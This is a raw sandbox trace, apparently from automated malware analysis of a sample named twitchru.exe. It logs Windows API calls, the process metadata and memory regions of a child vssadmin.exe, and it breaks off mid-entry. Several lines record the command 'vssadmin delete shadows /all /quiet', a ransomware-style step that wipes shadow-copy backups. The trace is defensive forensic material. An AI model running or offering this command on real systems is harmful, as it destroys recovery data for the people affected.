[0120.042] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x82e790, lpData=0x82e798, lpcbData=0x82e794*=0x1000 | out: lpType=0x82e790*=0x0, lpData=0x82e798*=0x9, lpcbData=0x82e794*=0x1000) returned 0x2 [0120.042] RegCloseKey (hKey=0x94) returned 0x0 [0120.042] time (in: timer=0x0 | out: timer=0x0) returned 0x5c099832 [0120.042] srand (_Seed=0x5c099832) [0120.042] GetCommandLineW () returned="cmd /c vssadmin delete shadows /all /quiet" [0120.042] GetCommandLineW () returned="cmd /c vssadmin delete shadows /all /quiet" [0120.042] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe46720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0120.042] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb99cf0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0120.042] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0120.043] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.043] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.043] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0120.043] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0120.043] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0120.043] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0120.043] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0120.043] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0120.043] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0120.043] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0120.043] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0120.043] GetEnvironmentStringsW () returned 0xb97d98* [0120.043] FreeEnvironmentStringsA (penv="A") returned 1 [0120.043] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.043] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.043] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0120.043] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0120.043] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0120.043] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0120.043] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0120.043] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0120.043] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0120.043] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0120.044] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x82f564 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0120.044] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x82f564, lpFilePart=0x82f55c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x82f55c*="Desktop") returned 0x1d [0120.044] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0120.044] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x82f2e0 | out: lpFindFileData=0x82f2e0) returned 0xb905c8 [0120.044] FindClose (in: hFindFile=0xb905c8 | out: hFindFile=0xb905c8) returned 1 [0120.044] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x82f2e0 | out: lpFindFileData=0x82f2e0) returned 0xb905c8 [0120.044] FindClose (in: hFindFile=0xb905c8 | out: hFindFile=0xb905c8) returned 1 [0120.044] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0120.044] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x82f2e0 | out: lpFindFileData=0x82f2e0) returned 0xb905c8 [0120.045] FindClose (in: hFindFile=0xb905c8 | out: hFindFile=0xb905c8) returned 1 [0120.045] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0120.045] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0120.045] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0120.045] GetEnvironmentStringsW () returned 0xb97d98* [0120.045] FreeEnvironmentStringsA (penv="=") returned 1 [0120.045] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe46720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0120.045] GetConsoleOutputCP () returned 0x1b5 [0120.046] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe3e460 | out: lpCPInfo=0xe3e460) returned 1 [0120.046] GetUserDefaultLCID () returned 0x409 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe424a0, cchData=8 | out: lpLCData=":") returned 2 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x82f694, cchData=128 | out: lpLCData="0") returned 2 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x82f694, cchData=128 | out: lpLCData="0") returned 2 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x82f694, cchData=128 | out: lpLCData="1") returned 2 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe424b0, cchData=8 | out: lpLCData="/") returned 2 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe42500, cchData=32 | out: lpLCData="Mon") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe42540, cchData=32 | out: lpLCData="Tue") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe42580, cchData=32 | out: lpLCData="Wed") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe425c0, cchData=32 | out: lpLCData="Thu") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe42600, cchData=32 | out: lpLCData="Fri") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xe42640, cchData=32 | out: lpLCData="Sat") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xe42680, cchData=32 | out: lpLCData="Sun") returned 4 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xe424c0, cchData=8 | out: lpLCData=".") returned 2 [0120.046] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xe424e0, cchData=8 | out: lpLCData=",") returned 2 [0120.046] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.047] GetConsoleTitleW (in: lpConsoleTitle=0xb9aa18, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x2a [0120.048] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75260000 [0120.048] GetProcAddress (hModule=0x75260000, lpProcName="CopyFileExW") returned 0x7527fa80 [0120.048] GetProcAddress (hModule=0x75260000, lpProcName="IsDebuggerPresent") returned 0x7527a790 [0120.048] GetProcAddress (hModule=0x75260000, lpProcName="SetConsoleInputExeNameW") returned 0x74f835c0 [0120.049] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0120.049] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0120.049] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0120.049] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0120.049] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0120.049] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0120.049] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0120.050] GetConsoleTitleW (in: lpConsoleTitle=0x82f380, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x2a [0120.050] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0120.050] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0120.050] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0120.050] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0120.050] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0120.050] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0120.050] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0120.051] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0120.051] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0120.051] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0120.051] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0120.051] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0120.051] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0120.051] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0120.051] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0120.051] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0120.051] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0120.051] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0120.051] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0120.051] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0120.051] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0120.051] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0120.051] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0120.051] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0120.051] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0120.051] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0120.051] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0120.051] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0120.051] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0120.051] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0120.051] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0120.051] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0120.051] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0120.051] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0120.051] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0120.051] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0120.051] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0120.051] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0120.051] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0120.051] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0120.051] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0120.051] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0120.051] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0120.051] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0120.051] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0120.052] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0120.052] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0120.052] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0120.052] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0120.052] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0120.052] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0120.052] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0120.052] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0120.052] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0120.052] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0120.052] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0120.052] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0120.052] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0120.052] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0120.052] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0120.052] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0120.052] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0120.052] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0120.052] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0120.052] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0120.052] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0120.052] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0120.052] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0120.052] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0120.052] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0120.052] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0120.052] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0120.052] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0120.052] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0120.052] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0120.052] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0120.052] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0120.052] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0120.052] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0120.052] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0120.052] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0120.053] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0120.053] SetErrorMode (uMode=0x0) returned 0x0 [0120.053] SetErrorMode (uMode=0x1) returned 0x0 [0120.053] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb9af80, lpFilePart=0x82ee8c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x82ee8c*="Desktop") returned 0x1d [0120.053] SetErrorMode (uMode=0x0) returned 0x1 [0120.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0120.053] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.060] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe3e4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.062] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x82ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x82ec18) returned 0xffffffff [0120.062] GetLastError () returned 0x2 [0120.062] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x82ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x82ec18) returned 0xffffffff [0120.064] GetLastError () returned 0x2 [0120.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x82ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x82ec18) returned 0xb9b320 [0120.064] FindClose (in: hFindFile=0xb9b320 | out: hFindFile=0xb9b320) returned 1 [0120.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x82ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x82ec18) returned 0xffffffff [0120.064] GetLastError () returned 0x2 [0120.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x82ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x82ec18) returned 0xb9b320 [0120.064] FindClose (in: hFindFile=0xb9b320 | out: hFindFile=0xb9b320) returned 1 [0120.064] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0120.064] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0120.064] GetConsoleTitleW (in: lpConsoleTitle=0x82f10c, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe") returned 0x2a [0120.074] InitializeProcThreadAttributeList (in: lpAttributeList=0x82f038, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x82f01c | out: lpAttributeList=0x82f038, lpSize=0x82f01c) returned 1 [0120.074] UpdateProcThreadAttribute (in: lpAttributeList=0x82f038, dwFlags=0x0, Attribute=0x60001, lpValue=0x82f024, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x82f038, lpPreviousValue=0x0) returned 1 [0120.075] GetStartupInfoW (in: lpStartupInfo=0x82f070 | out: lpStartupInfo=0x82f070*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0120.075] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0120.076] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0120.076] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0120.076] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0120.077] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x82efc0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x82f00c | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x82f00c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcc0, dwThreadId=0xcc4)) returned 1 [0120.248] CloseHandle (hObject=0xa4) returned 1 [0120.248] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.248] GetEnvironmentStringsW () returned 0xb99f00* [0120.248] FreeEnvironmentStringsA (penv="=") returned 1 [0120.248] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0125.770] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x82efa4 | out: lpExitCode=0x82efa4*=0x2) returned 1 [0125.770] CloseHandle (hObject=0xa8) returned 1 [0125.770] _vsnwprintf (in: _Buffer=0x82f08c, _BufferCount=0x13, _Format="%08X", _ArgList=0x82efac | out: _Buffer="00000002") returned 8 [0125.770] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0125.770] GetEnvironmentStringsW () returned 0xb97d98* [0125.770] FreeEnvironmentStringsA (penv="=") returned 1 [0125.770] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0125.770] GetEnvironmentStringsW () returned 0xb97d98* [0125.771] FreeEnvironmentStringsA (penv="=") returned 1 [0125.771] DeleteProcThreadAttributeList (in: lpAttributeList=0x82f038 | out: lpAttributeList=0x82f038) [0125.771] _get_osfhandle (_FileHandle=1) returned 0xc [0125.771] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x3) returned 1 [0125.771] _get_osfhandle (_FileHandle=1) returned 0xc [0125.771] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0xe3e40c | out: lpMode=0xe3e40c) returned 1 [0125.771] _get_osfhandle (_FileHandle=0) returned 0x8 [0125.771] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0xe3e408 | out: lpMode=0xe3e408) returned 1 [0125.771] SetConsoleInputExeNameW () returned 0x1 [0125.771] GetConsoleOutputCP () returned 0x1b5 [0125.772] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe3e460 | out: lpCPInfo=0xe3e460) returned 1 [0125.772] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.772] exit (_Code=2) Thread: id = 13 os_tid = 0xcbc Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x27f51000" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xcb4" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00014ee5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 494 start_va = 0x60000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 495 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 496 start_va = 0x90000 end_va = 0xa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 497 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 498 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 499 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 500 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 501 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 502 start_va = 0x13d0000 end_va = 0x13edfff entry_point = 0x13d0000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\SysWOW64\\vssadmin.exe" (normalized: "c:\\windows\\syswow64\\vssadmin.exe") Region: id = 503 start_va = 